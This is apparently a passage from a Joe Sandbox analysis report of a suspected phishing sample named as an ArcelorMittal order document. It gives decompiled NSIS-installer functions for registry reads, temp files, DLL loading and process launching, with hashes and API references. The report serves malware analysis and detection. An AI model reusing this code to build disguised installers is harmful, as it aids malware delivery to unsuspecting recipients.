Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 38507b3aef3ee9abc9b8276ad5151edb672a95bd9cb7be4891eb61a897a54be5
Instruction ID: 96ecc02dbfbaaadde43e4edb48da855e10ebdec385bf1e19a14d4c4ac13e51f4
Opcode Fuzzy Hash: 38507b3aef3ee9abc9b8276ad5151edb672a95bd9cb7be4891eb61a897a54be5
Instruction Fuzzy Hash: 4E116A72904119BFEF109F90DF8CEAE3B79FB54384B10403AF906A10A0D7B48E55AA69

Uniqueness

Uniqueness Score: -1.00%

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A9(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A9(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A9(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E1000246C(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B5F(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100028A4(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002645(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x10001759
0x10001759
0x10001759
0x10001763
0x1000176b
0x10001778
0x10001786
0x10001789
0x1000178b
0x10001790
0x10001795
0x100018a8
0x100018a8
0x1000179b
0x1000179f
0x100017a2
0x100017a7
0x100017a8
0x100017a9
0x100017af
0x100017b5
0x100017e5
0x100017ec
0x10001810
0x1000184f
0x10001812
0x10001812
0x10001813
0x10001816
0x1000181c
0x10001820
0x10001823
0x10001828
0x10001828
0x1000182f
0x10001835
0x1000183b
0x10001847
0x10001848
0x1000184b
0x100017ee
0x100017ef
0x10001804
0x10001804
0x10001859
0x1000185c
0x10001869
0x10001870
0x10001878
0x1000187b
0x1000187b
0x10001878
0x10001888
0x10001890
0x10001895
0x10001888
0x1000189d
0x00000000
0x1000189f
0x00000000
0x100018a0
0x1000189d
0x100017b9
0x100017bc
0x100017da
0x00000000
0x00000000
0x100017dd
0x100017e2
0x100017e2
0x100017e4
0x00000000
0x100017e4
0x100017be
0x100017bf
0x100017c7
0x100017c8
0x00000000
0x100017c8
0x100017c1
0x100017c2
0x100017d0
0x00000000
0x100017d0
0x100017c5
0x00000000
0x00000000
0x00000000
0x100017c5

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Uniqueness

Uniqueness Score: -1.00%

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BDF() {
				signed int _t28;
				WCHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x14) = E00402BA2(3);
				 *(_t55 + 8) = E00402BA2(4);
				if(( *(_t55 - 0x18) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x14)) = E00402BBF(0x33);
				}
				__eflags =  *(_t55 - 0x18) & 0x00000002;
				if(( *(_t55 - 0x18) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402BBF(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x30)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402BBF();
					_t28 = E00402BBF();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExW( *(_t55 - 0x14),  *(_t55 + 8), _t31,  ~( *_t28) & _t28); // executed
					goto L10;
				} else {
					_t52 = E00402BA2();
					_t37 = E00402BA2();
					_t48 =  *(_t55 - 0x18) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageW(_t52, _t37,  *(_t55 - 0x14),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutW(_t52, _t37,  *(_t55 - 0x14),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x2c)) >= _t42) {
					_push( *(_t55 - 8));
					E00405F79();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401be8
0x00401bf4
0x00401bf7
0x00401c00
0x00401c00
0x00401c03
0x00401c07
0x00401c10
0x00401c10
0x00401c13
0x00401c17
0x00401c19
0x00401c66
0x00401c68
0x00401c73
0x00401c7d
0x00401c80
0x00401c80
0x00401c89
0x00000000
0x00401c1b
0x00401c22
0x00401c24
0x00401c2c
0x00401c2f
0x00401c57
0x00401c8f
0x00401c8f
0x00401c31
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c2f
0x00401c92
0x00401c95
0x00401c9b
0x004029f2
0x004029f2
0x00402a4f
0x00402a5b

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 8319822774fdde759edfcdb62c3affa0c5abdf9aa0933c2ceeb1a99f4013fbda
Instruction ID: 0a841d9a538a1c78525c7c746850703aa7529d4a1cc505f1b812f839afa95e13
Opcode Fuzzy Hash: 8319822774fdde759edfcdb62c3affa0c5abdf9aa0933c2ceeb1a99f4013fbda
Instruction Fuzzy Hash: 4B219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B88A409B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405EFF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405EFF(void* _a4, int _a8, short* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				long _t24;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExW(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x800;
					_t23 = RegQueryValueExW(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x7fe] = 0;
					_t24 = RegCloseKey(_a20); // executed
					return _t24;
				}
				return _t20;
			}

0x00405f0f
0x00405f11
0x00405f1e
0x00405f29
0x00405f31
0x00405f36
0x00405f4a
0x00405f52
0x00405f60
0x00405f60
0x00405f66
0x00405f6d
0x00000000
0x00405f6d
0x00405f76

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F29
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4A
RegCloseKey.KERNELBASE(?,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D

Strings

Call, xrefs: 00405F02

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: 550e653c67ea0eb77a08417ddc9dcc7927ab5f79673ec66d03fd3a0aafaa2bf7
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: AC015A3110020AEACF218F26ED08EDB3BACEF88350F00403AF844D2260D774D964DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C36(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a574; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405c3c
0x00405c42
0x00405c43
0x00405c43
0x00405c48
0x00405c49
0x00405c4c
0x00405c51
0x00405c54
0x00405c5e
0x00405c6b
0x00405c6f
0x00405c77
0x00000000
0x00000000
0x00405c7b
0x00000000
0x00405c7d
0x00405c7d
0x00405c7d
0x00405c80
0x00405c83
0x00405c83
0x00405c86
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405C54
GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040327B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 00405C6F

Strings

nsa, xrefs: 00405C43
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C3B

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-944333549
Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction ID: 8a35e51ea0d0ee70ea5c20e8edce62ba12a10af59c8f3d63fe044a56b3f339a6
Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction Fuzzy Hash: 99F06276600704BFEB008B55DD05E9F77A8EB91750F10403AED00F7140E6B09A548B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040639C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040639C(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryW( &_v576); // executed
				return _t17;
			}

0x004063b3
0x004063bc
0x004063be
0x004063be
0x004063c2
0x004063d5
0x004063cf
0x004063cf
0x004063cf
0x004063ee
0x004063fe
0x00406405

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063B3
wsprintfW.USER32 ref: 004063EE
LoadLibraryW.KERNELBASE(?), ref: 004063FE

Strings

%s%S.dll, xrefs: 004063E8

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction ID: 2cc1e6addeffa93896351747fd2b076c866e84041b4f9c80d347ce7491f0a061
Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction Fuzzy Hash: 6CF0BB70510129D7DB14AB64EE0DD9B366CEB00305F11447BA946F10D1FBBCDA69CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00401E66() {
				void* _t16;
				long _t20;
				void* _t25;
				void* _t32;

				_t29 = E00402BBF(_t25);
				E00405191(0xffffffeb, _t14);
				_t16 = E00405712(_t29); // executed
				 *(_t32 + 8) = _t16;
				if(_t16 == _t25) {
					 *((intOrPtr*)(_t32 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t32 - 0x24)) != _t25) {
						_t20 = WaitForSingleObject(_t16, 0x64);
						while(_t20 == 0x102) {
							E00406444(0xf);
							_t20 = WaitForSingleObject( *(_t32 + 8), 0x64);
						}
						GetExitCodeProcess( *(_t32 + 8), _t32 - 8);
						if( *((intOrPtr*)(_t32 - 0x28)) < _t25) {
							if( *(_t32 - 8) != _t25) {
								 *((intOrPtr*)(_t32 - 4)) = 1;
							}
						} else {
							E00405F79( *((intOrPtr*)(_t32 - 0x10)),  *(_t32 - 8));
						}
					}
					_push( *(_t32 + 8));
					CloseHandle();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t32 - 4));
				return 0;
			}

0x00401e6c
0x00401e71
0x00401e77
0x00401e7e
0x00401e81
0x0040281e
0x00401e87
0x00401e8a
0x00401e95
0x00401eac
0x00401ea0
0x00401eaa
0x00401eaa
0x00401eb7
0x00401ec0
0x00401ed2
0x00401ed4
0x00401ed4
0x00401ec2
0x00401ec8
0x00401ec8
0x00401ec0
0x00401edb
0x00401ede
0x00401ede
0x00402a4f
0x00402a5b

APIs

Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C

Part of subcall function 00405712: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F48,Error launching installer), ref: 0040573B
Part of subcall function 00405712: CloseHandle.KERNEL32(0040A300), ref: 00405748

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 292fba3ef36fd8685870359653941cf5ea216951d9d1ba9b9747b06d0b390f79
Instruction ID: d208eef208ec2c6f5187e880842865a00525bcfa3f2a05837fac4e2667901554
Opcode Fuzzy Hash: 292fba3ef36fd8685870359653941cf5ea216951d9d1ba9b9747b06d0b390f79
Instruction Fuzzy Hash: F911C431A00508EBCF20AF91CD859AE7BB2EF40314F24403BF501B61E1C7798A91DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015B9(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402BBF(0xfffffff0);
				_t17 = E00405A91(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405A13(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E004056DD( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x24)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x24)) == _t28 || E004056FA(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405660( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
